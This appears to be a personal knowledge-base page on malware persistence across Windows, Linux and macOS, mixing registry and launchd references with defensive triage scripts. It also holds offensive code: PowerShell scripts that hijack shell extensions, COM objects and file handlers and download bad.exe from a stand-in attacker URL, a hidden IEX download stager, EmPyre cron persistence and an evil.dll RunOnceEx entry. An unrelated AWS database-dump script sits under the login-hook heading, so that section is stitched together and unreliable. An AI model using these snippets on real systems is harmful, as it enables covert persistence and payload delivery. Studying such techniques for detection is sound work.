This is about … .
Active Setup (Not yet processed)
## Startup
### Windows
The list of registry keys and folders that could be abused for persistence and escalation:
- Startup folder for the current user: `C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` (default)
- Startup folder for all users: `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp` (default)
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` (default)
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce` (default)
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run` (default)
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce` (default)
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`, e.g. `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` (when specified in the policy settings)
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` (when specified in the policy settings)
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows`: run when any user logs on.
- The multistring `BootExecute` value of the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` is set to `autocheck autochk *`. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value, which will automatically launch at boot.
- Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\` with the key value of `"Authentication Packages"=<target binary>`. The binary will then be executed by the system when the authentication packages are loaded.
- Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.
- Registry entries in `HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\` and `HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` are used to manage additional helper programs and functionalities that support Winlogon:
  - `Winlogon\Notify` points to notification package DLLs that handle Winlogon events
  - `Winlogon\Userinit` points to userinit.exe, the user initialization program executed when a user logs on
  - `Winlogon\Shell` points to explorer.exe, the system shell executed when a user logs on
- `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages` and `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages`: packages listed here load into LSA space, meaning they have access to unencrypted password info.
📘 BTFM: `autorunsc -v [options] > result.csv`
### Linux
- `/etc/systemd/system`
- `/usr/lib/systemd/system`
- `/etc/init*`
### macOS
#### Login Items
System Preferences -> Users & Groups -> Login Items. Additional: SDF podcast.
How to determine if it's malicious? The only sure way is to reverse engineer it, but that is time consuming, so you need to narrow down the candidates first. There are a couple of indicators that are commonly seen in malware.
> Login items run within the user's desktop session, inheriting the user's permissions, and start automatically at user login. Due to this afforded persistence, Mac malware will commonly install itself as a login item. You can find examples of this technique in malware like Kitm, NetWire, and WindTail.

Wardle, Patrick. The Art of Mac Malware (p. 24). No Starch Press. Kindle Edition.
❗️ macOS doesn't readily show the full path to a persisted login item in its interface (unless you hover over the item for a few seconds).
👻 `backgroundtaskmanagementagent` is a daemon that runs in the background and also manages login items. The list of the items is stored in a file ⚙️ named `backgrounditems.btm`.
#### Programming persistence
⚙️ `LSSharedFileListCreate` (returns the reference to the list) -> `LSSharedFileListInsertItemURL` (adds a new item, requires a full path to the item).
To view the APIs used, run `nm WindTail/Final_Presentation.app/Contents/MacOS/usrnode`. Seeing the above two APIs in the list suggests this persistence mechanism was used by the binary.
🥷🏼 (stealthy) `SMLoginItemSetEnabled`: see the "Modern Login Items" blog post or Apple's documentation on the topic. This allows application-specific helper login items. They don't show up in the Preferences. Those items are stored in the `LoginItems` subdirectory of an application's bundle.
## Boot
### Windows
#### Flashing BIOS
Update BIOS with the malicious code included. More here.
#### Boot execute
Not sure what that means https://www.tenable.com/plugins/nessus/70615. Could be this:
- 🔑 `HKLM\System\CurrentControlSet\Control\ServiceControlManagerExtension`
- 🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute`
- 🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\Execute`
- 🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\S0InitialCommand`
- 🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\SetupExecute`
## Services
### Windows
🔑 `HKLM\SYSTEM\CurrentControlSet\Services`. The executable needs to have certain code and permissions for service behaviour, and there are three options to accomplish that:
- New service. If the `Start` value is `0x2` (see 🔑 above), the service starts at boot. Example 🦠: APT1, RIP listener service. ⚒️ `sc [queryex|qc|qprivs|qtriggerinfo]`.
- Hijacking, aka Replacement. Requires modifications to some existing service, usually a rarely used one. Example 🦠: GlassRAT.
- Service failure recovery. Load something 🦠 bad when something good and service-like 👼 crashes. You can define what to do if a certain service crashes; usually it's restarting the service. However, this setting can be changed to launch another executable. ⚒️ Kansa PowerShell Framework (`Get_SvcFail.ps1` script), event logs.
Kansa has several scripts to stack services. You can also use the general one:
```powershell
.\Get-LogparserStack.ps1 -FilePattern *SvcAll.csv -Delimiter "," -Direction asc -OutFile SvcAll-workstation-stack.csv
```
To do the same job with plain PowerShell (no Logparser):
```powershell
# Load every per-host service listing into one collection
$result = Get-ChildItem -Path ".\*SvcAll.csv" | ForEach-Object { Import-Csv -Path $_.FullName }
# Inspect the column names once, to confirm Name, PathName and PSComputerName are present
$result[0] | Get-Member -MemberType NoteProperty | Select-Object Name
# Stack: count how many hosts share each (Name, PathName) pair; rare pairs deserve a look
$groupedData = $result | Group-Object -Property Name, PathName | Sort-Object Count |
    Select-Object Count,
        @{Name = "Name";     Expression = { $_.Group[0].Name }},
        @{Name = "PathName"; Expression = { $_.Group[0].PathName }},
        @{Name = "PC";       Expression = { ($_.Group.PSComputerName | Sort-Object -Unique) -join ";" }}
$groupedData | Export-Csv -Path "result.csv" -NoTypeInformation
```
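The same least-frequency stacking in Python, as an added example (not Kansa's code): it assumes each per-host CSV carries the `Name`, `PathName` and `PSComputerName` columns, and the three host exports are constructed inline.

```python
"""Least-frequency-of-occurrence ("stacking") of Windows services across hosts.

Added example, not Kansa's own code. It assumes each per-host CSV carries the
columns Name, PathName and PSComputerName, as the PowerShell snippet above does.
"""
import csv
import io
from collections import defaultdict

# Constructed sample: three hosts' *SvcAll.csv exports. Everything is identical
# except one extra service on WS-03 with a binary outside the usual locations.
SAMPLE_CSVS = {
    "WS-01_SvcAll.csv": """Name,PathName,StartMode,PSComputerName
Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto,WS-01
W32Time,C:\\Windows\\system32\\svchost.exe -k LocalService,Manual,WS-01
""",
    "WS-02_SvcAll.csv": """Name,PathName,StartMode,PSComputerName
Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto,WS-02
W32Time,C:\\Windows\\system32\\svchost.exe -k LocalService,Manual,WS-02
""",
    "WS-03_SvcAll.csv": """Name,PathName,StartMode,PSComputerName
Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto,WS-03
W32Time,C:\\Windows\\system32\\svchost.exe -k LocalService,Manual,WS-03
winsvchost,C:\\Users\\Public\\winsvchost.exe,Auto,WS-03
""",
}

def stack_services(csv_texts):
    """Group rows by (Name, PathName) and record which hosts carry each pair.

    Returns a list of (count, name, path, sorted hosts), rarest first, which is
    the same view Get-LogparserStack.ps1 -Direction asc produces.
    """
    hosts_by_pair = defaultdict(set)
    for text in csv_texts:
        for row in csv.DictReader(io.StringIO(text)):
            # Normalise case and whitespace so cosmetic differences do not
            # split one legitimate service into several "rare" buckets.
            key = (row["Name"].strip().lower(), row["PathName"].strip().lower())
            hosts_by_pair[key].add(row["PSComputerName"].strip())
    stacked = [(len(h), n, p, sorted(h)) for (n, p), h in hosts_by_pair.items()]
    stacked.sort(key=lambda r: (r[0], r[1]))
    return stacked

def outliers(stacked, total_hosts, max_fraction=0.1):
    """Return pairs seen on at most max_fraction of hosts (at least one host)."""
    threshold = max(1, int(total_hosts * max_fraction))
    return [r for r in stacked if r[0] <= threshold]

if __name__ == "__main__":
    rows = stack_services(SAMPLE_CSVS.values())
    for count, name, path, hosts in rows:
        print(f"{count:>3}  {name:<12} {path:<55} {';'.join(hosts)}")
    print("outliers:", outliers(rows, total_hosts=len(SAMPLE_CSVS)))
```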
### Linux
Unused services. To disable a service:
```bash
sudo systemctl stop <servicename>
sudo systemctl disable <servicename>
```
### macOS
⚙️ The most relevant keys in a launch item plist are the following:
- `Label`
- `ProgramArguments`
- `RunAtLoad` - persistence.
- `PathState` (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
- `StartCalendarInterval` (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
👻 The `launchd` process is responsible for running these items. 📚 Reference: A launchd tutorial, https://www.launchd.info/; "Getting Started with Launchd for Sys Admins," Penn State MacAdmins Conference 2012, https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf.
An example:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC ...>
<plist version="1.0"><dict>
<key>Label</key>
<string>com.foo.bar</string>
<key>ProgramArguments</key>
<array>
<string>/Users/user/launchItem</string>
<string>argument 1</string>
<string>argument 2</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
```
Wardle, Patrick. The Art of Mac Malware (p. 27). No Starch Press. Kindle Edition.
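An added triage helper (not from the book) that reads a launchd plist with `plistlib` and reports the keys listed above; the sample plist is constructed to mirror the example, and the "trusted prefix" heuristic is this example's own assumption.

```python
"""Triage a launchd property list for the persistence-relevant keys discussed above.

Added example, not from The Art of Mac Malware. The sample plist is constructed;
the heuristics (program path outside system locations, RunAtLoad, intervals) are
this example's own and should be tuned to the environment.
"""
import plistlib

# Constructed sample mirroring the plist shown on the page, plus a StartInterval.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.foo.bar</string>
  <key>ProgramArguments</key>
  <array><string>/Users/user/launchItem</string><string>argument 1</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

# Locations from which Apple-shipped launch items normally run their programs (assumption).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")

def program_path(item):
    """Return the executable a launch item runs: Program, else ProgramArguments[0]."""
    if "Program" in item:
        return item["Program"]
    args = item.get("ProgramArguments") or []
    return args[0] if args else None

def triage_launch_item(plist_bytes):
    """Return (label, program, list of findings) for one launchd plist."""
    item = plistlib.loads(plist_bytes)
    prog = program_path(item)
    findings = []
    if item.get("RunAtLoad"):
        findings.append("RunAtLoad: runs when loaded, i.e. at boot/login")
    if "StartInterval" in item:
        findings.append(f"StartInterval: re-runs every {item['StartInterval']}s")
    if "StartCalendarInterval" in item:
        findings.append("StartCalendarInterval: scheduled re-execution")
    keep = item.get("KeepAlive")
    if keep is True or (isinstance(keep, dict) and keep):
        findings.append("KeepAlive: relaunched if it exits")
    if prog is None:
        findings.append("no Program/ProgramArguments: nothing to run (or malformed)")
    elif not prog.startswith(TRUSTED_PREFIXES):
        findings.append(f"program outside system locations: {prog}")
    if prog and prog.startswith(("/tmp/", "/private/tmp/", "/Users/Shared/")):
        findings.append("program in a world-writable directory")
    return item.get("Label"), prog, findings

if __name__ == "__main__":
    label, prog, findings = triage_launch_item(SAMPLE_PLIST)
    print(label, prog)
    for f in findings:
        print(" -", f)
```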
#### Agents
Run once the user is logged in. Do not have root permissions. They may interact with the user session.
The plists can be found here:
```bash
/Library/LaunchAgents
~/Library/LaunchAgents
# to read the file run
plutil -p <path to plist>
defaults read <path to plist>
```
#### Daemons
They usually run before the user logs in. Do not require user interaction. They run with 👑 root permissions.
The plists can be found here:
```bash
/Library/LaunchDaemons
# to read the file run
plutil -p <path to plist>
defaults read <path to plist>
```
## Libs
### Windows
For some of the injection techniques (low-level ones), see the [injections](/docs/reverse/malware-analysis/injections) article.
#### DLL Sideloading
Following is the search order for modern Windows systems:
1. Manifest (if the application provides an absolute path to the `dll`)
2. Search the RAM for the same module (already loaded). No searching.
3. DLLs in the same directory as the executable that loads it
4. `KnownDLLs` list: `HKLM\SYSTEM\CurrentControlSet\Control\WOW` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`. So, if the `dll` is in the list, the link from the registry is used, and there is no search conducted.
5. Application's loading directory
6. `C:\Windows\System32`
7. `C:\Windows\system`
8. `C:\Windows`
9. Application's registered App Paths directories ❓
10. `PATH` env variable
> ❗️ If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path. [[1](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)] So, that means that we can make a side-loading attack on "a side-loaded `dll`"!
> ❓Not sure about the different paths specified for the KnowDlls entries. This might be due to the different OS versions. See [here](http://stuff.is-a-geek.net/OnlineDocs/Microsoft/NTmisc/Troubleshooting%20NTVDM%20and%20WOW%20startup%20problems.htm):
>
> For 16-bit apps, Windows NT uses KnownDLLs to implicitly and explicitly load DLLs. The value is at `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WOW`. At this key, `KnownDLLs` is a type `REG_SZ` value which lists the 8.3 DLL names, separated by spaces. Without a `KnownDLLs` entry, `WOW` searches:
> 1. The current directory.
> 2. The `%SystemRoot%` directory.
> 3. The `%SystemRoot%\SYSTEM` directory.
> 4. The `%SystemRoot%\SYSTEM32` directory.
> 5. The `.exe` file directory.
> 6. The directories in your `Path` environment variable.
> With the `KnownDLLs` entry, `WOW` only searches the `%SystemRoot%\SYSTEM32` directory.
The order depends also on the `SafeDllSearchMode` (🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode`). Here is the quote from the [docs](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications):
>If **SafeDllSearchMode** is enabled ✅, the search order is as follows:
>1. The directory from which the application loaded.
>2. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
>3. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
>4. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> **5. The current directory.**
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
>
> If **SafeDllSearchMode** is disabled ⛔️, the search order is as follows:
> 1. The directory from which the application loaded.
> **2. The current directory.**
> 3. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
> 4. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
> 5. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
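To make the two quoted orders concrete, here is an added model (not Microsoft's code or API) of the desktop search order with `SafeDllSearchMode` on and off, plus the `KnownDLLs` short-circuit; the directory layout and DLL names are constructed, and manifests/redirection are deliberately left out of the model.

```python
"""Model the desktop DLL search order quoted above and show where a name resolves.

Added example, not Microsoft's code or API. Directory contents are constructed;
the point is to see which position SafeDllSearchMode gives the current directory
and why a KnownDLLs entry ends the search before any directory is consulted.
Manifests, redirection and API sets are out of scope of this simplified model.
"""

def dll_search_order(app_dir, cwd, system_dir, system16_dir, windows_dir,
                     path_dirs, safe_mode=True):
    """Return the ordered list of directories searched for a bare module name."""
    if safe_mode:
        # SafeDllSearchMode enabled: the current directory is pushed to 5th place
        order = [app_dir, system_dir, system16_dir, windows_dir, cwd]
    else:
        # Disabled: the current directory is searched right after the app dir
        order = [app_dir, cwd, system_dir, system16_dir, windows_dir]
    return order + list(path_dirs)  # App Paths is not part of the DLL search path

def resolve_dll(name, order, dir_contents, known_dlls=()):
    """Return the directory from which `name` would be loaded.

    dir_contents maps a directory to the set of DLL names it holds. A module in
    KnownDLLs is taken from the system directory without searching, so a copy
    planted in an earlier directory is never picked up for such names.
    """
    name = name.lower()
    if name in {k.lower() for k in known_dlls}:
        return "KnownDLLs -> " + SYSTEM_DIR
    for directory in order:
        if name in {d.lower() for d in dir_contents.get(directory, ())}:
            return directory
    return None

def shadowing_positions(name, order, dir_contents, known_dlls=()):
    """List directories searched *before* the one that actually holds `name`.

    Any writable directory in this list would let a same-named file shadow the
    legitimate DLL, which is what an auditor wants to know about.
    """
    legit = resolve_dll(name, order, dir_contents, known_dlls)
    if legit is None or legit.startswith("KnownDLLs"):
        return []
    return order[:order.index(legit)]

# Constructed layout: the app sits in Program Files, the user started it from a
# download folder (the current directory), and the DLLs live where they should,
# except for a same-named copy of version.dll in the download folder.
APP_DIR = r"C:\Program Files\App"
CWD = r"C:\Users\user\Downloads"
SYSTEM_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Tools"]
CONTENTS = {
    APP_DIR: {"app.dll"},
    SYSTEM_DIR: {"version.dll", "kernel32.dll"},
    CWD: {"version.dll"},
}
KNOWN_DLLS = ["kernel32.dll"]

def demo(safe_mode):
    """Resolve two names under the given SafeDllSearchMode setting."""
    order = dll_search_order(APP_DIR, CWD, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR,
                             PATH_DIRS, safe_mode)
    return {
        "version.dll": resolve_dll("version.dll", order, CONTENTS, KNOWN_DLLS),
        "kernel32.dll": resolve_dll("kernel32.dll", order, CONTENTS, KNOWN_DLLS),
        "shadowing": shadowing_positions("version.dll", order, CONTENTS, KNOWN_DLLS),
    }

if __name__ == "__main__":
    for mode in (True, False):
        print("SafeDllSearchMode", "on " if mode else "off", demo(mode))
```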
Side-by-side (SxS) loading is a mechanism for introducing updated versions of a DLL. It can be used to circumvent anti-virus. Example: PlugX RAT. A legitimately signed `exe` uses SxS to load a malicious `dll`: the attacker puts a nefarious `dll` somewhere along the search path to make sure it's loaded instead of the legitimate one.
📚 **References**: Read more [here](https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading).
#### Phantom DLL hijacking
An executable tries to load a very old `dll` that is no longer needed; some of them don't even exist anymore, for example `fxsst.dll`. The attacker just creates a `dll` with the same name and some nefarious functionality.
### macOS
#### Dylib Environment Variables
```bash
DYLD_*
DYLD_INSERT_LIBRARIES # all libs from this env var will be loaded
DYLD_FRAMEWORK_PATH
```
These libraries are loaded within a trusted host process, not resulting in a new process.
In a plist for a launch item the key is `EnvironmentVariables`; for an application it is `LSEnvironment` (in `Info.plist`).
#### Proxying
#### Hijacking
## Tasks
### Windows
- `C:\Windows\Tasks\*.job`
- `C:\Windows\SchedLgU.txt`
- `C:\Windows\System32\Tasks`
`at.exe` (deprecated but can still be used) and `schtasks.exe`. For `at`, see `at*.job` and `SchedLgU.txt`; for the second one, see Task Scheduler and Security Logs. WinXP: `at` jobs run with SYSTEM privileges. Files are created in `\Windows\Tasks` and `\Windows\System32\Tasks` (XML duplicate, Win7+). Created with `at.exe 22:22:22 C:\mal.exe` or `schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe`.
📕 RTFM
An attempt to be stealthy:
```powershell
# No PowerShell window is shown and no output is displayed; the script to execute is base64 encoded.
# -W    WindowStyle = Hidden
# -nop  NoProfile: does not load the PS profile
# -noni NonInteractive: no interactive prompt is presented to the user
powershell -W Hidden -nop -noni -ec <base64something>
# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')
```
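For the detection side of the pattern above, an added triage helper (not from the RTFM) that decodes the `-ec` payload (base64 of UTF-16LE text) and flags the switches and cmdlets the snippet relies on; the two sample command lines are constructed in the script, and the indicator list is this example's own, not a complete signature.

```python
"""Decode and flag the hidden/encoded PowerShell invocation pattern shown above.

Added example for detection triage, not from the RTFM. The sample command lines
are constructed here (encoded by the script itself), and the indicator list is
this example's own, not an exhaustive signature.
"""
import base64
import binascii
import re

# -ec / -e / -enc / -EncodedCommand all take a base64 string of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:ec|e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Switches and cmdlets the RTFM snippet relies on, with what they mean to an analyst.
INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), "profile skipped (-nop)"),
    (re.compile(r"(?i)(?:^|\s)-noni(?:nteractive)?\b"), "non-interactive (-noni)"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest"), "download"),
    (re.compile(r"(?i)https?://"), "URL present"),
]

def decode_encoded_command(cmdline):
    """Return the decoded -ec payload, or None if there is none / it is not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyse(cmdline):
    """Return (decoded payload or None, sorted list of matched indicators).

    Indicators are matched on the outer command line *and* on the decoded
    payload, since that is where IEX/DownloadString usually hides.
    """
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = {label for rx, label in INDICATORS if rx.search(text)}
    if decoded is not None:
        hits.add("encoded command")
    return decoded, sorted(hits)

def encode_for_sample(script):
    """Build a -ec argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed samples: a benign scheduled script and the stealthy pattern from the page
# (the URL is a reserved .invalid placeholder, not a real host).
BENIGN = "powershell -NoProfile -File C:\\Scripts\\rotate-logs.ps1"
STAGER = ("IEX (New-Object System.Net.WebClient)"
          ".DownloadString('http://example.invalid/file')")
SUSPICIOUS = "powershell -W Hidden -nop -noni -ec " + encode_for_sample(STAGER)

if __name__ == "__main__":
    for line in (BENIGN, SUSPICIOUS):
        decoded, hits = analyse(line)
        print(line[:60], "->", hits)
        if decoded:
            print("   decoded:", decoded)
```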
### Linux
- `/etc/cron*`
- `/var/spool/crontabs`
- `/var/spool/atjobs`
- `/etc/anacron`
### macOS
#### Cron
`/usr/bin/crontab`
The post-exploitation RT tool EmPyre has a module to exploit this technique:
```python
import subprocess

cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
```
The `cat` and `echo` commands append the new command. The `%s` in the `cmd` variable will be updated at runtime with the path of the item to persist, and the `0 * * * *` component instructs macOS to execute the job every hour. The `crontab -` will reinstall any existing jobs, along with the new one.
#### At
Jobs are stored in the `/private/var/at/jobs/` directory; enumerate them via the `/usr/bin/atq` utility.
❗️ On a default install of macOS, the `at` scheduler, `/usr/libexec/atrun`, is disabled. However, malware can enable it with 👑 root privileges with the following command: `launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist`.
After enabling this scheduler, malware can create an `at` job by simply piping persistent commands into `/usr/bin/at`, specifying the time and date of execution.
Not a popular technique.
#### Periodic
`/etc/periodic`
Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. "What is the difference between 'periodic' and 'cron' on OS X?" https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/
#### Login and Logout Hooks
Look for either `LoginHook` or `LogoutHook` in the following plist: `~/Library/Preferences/com.apple.loginwindow.plist`
📕 RTFM
```bash
#!/bin/bash
export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token)
export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*
```
## Policies
### Windows
More about it here. This could be used to allow some legit software.
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` (when specified in the policy settings)
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` (when specified in the policy settings)
### Office
📚 References: More here.
## IPC
### Windows
#### Shell Extension Handlers
`Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers`. Same under `HKLM`. ⚠️ No admin creds are needed to add a value here, to `HKCU` only. The GUID here is the same as listed in the `CLSID` subkey. To add a malicious extension one needs to create a unique GUID, add a subkey to `CLSID`, add a path to the `dll`, and then add a shell extension in the registry above using the same GUID. Use 🛠 OLE/COM Object Viewer to see all COM objects registered. Simply clicking an image or an archive file may trigger a malicious act.
```powershell
$Path="HKCU:\Software\Classes\*\shellex\ContextMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"
New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1
$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"
Invoke-WebRequest -Uri $Url -OutFile $Out
```
#### COM Hijack
In Process Monitor, filter: Path contains `CLSID` and Result is `NAME NOT FOUND`. The entry exists in `HKLM\Software\Classes\CLSID\{GUID}` but doesn't exist at `HKCU\Software\Classes\CLSID\{GUID}`. The loader looks for the entry in HKCU first and, if it's not found, in HKLM. That's where we can add an entry under HKCU. PowerShell needs to be used, since it's a trusted application for the registry.
```powershell
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"
New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1
$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"
Invoke-WebRequest -Uri $Url -OutFile $Out
```
#### Extension Handler Hijacking
`Computer\HKCR\`, subkeys `Open` and `Command`. An attacker can't change HKCR or HKLM, but can change `HKCU` and `HKU` without admin privileges. Using a proxy within `Command` will help remain low: `proxy.exe "{path/to/real/app}"` (starts the meterpreter, for example, then launches the real application). ⚠️ PowerShell is not necessary; the HKU hive can be edited without it.
```powershell
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\tmp\bad.exe"
New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value
$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"
Invoke-WebRequest -Uri $Url -OutFile $Out
```
Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.
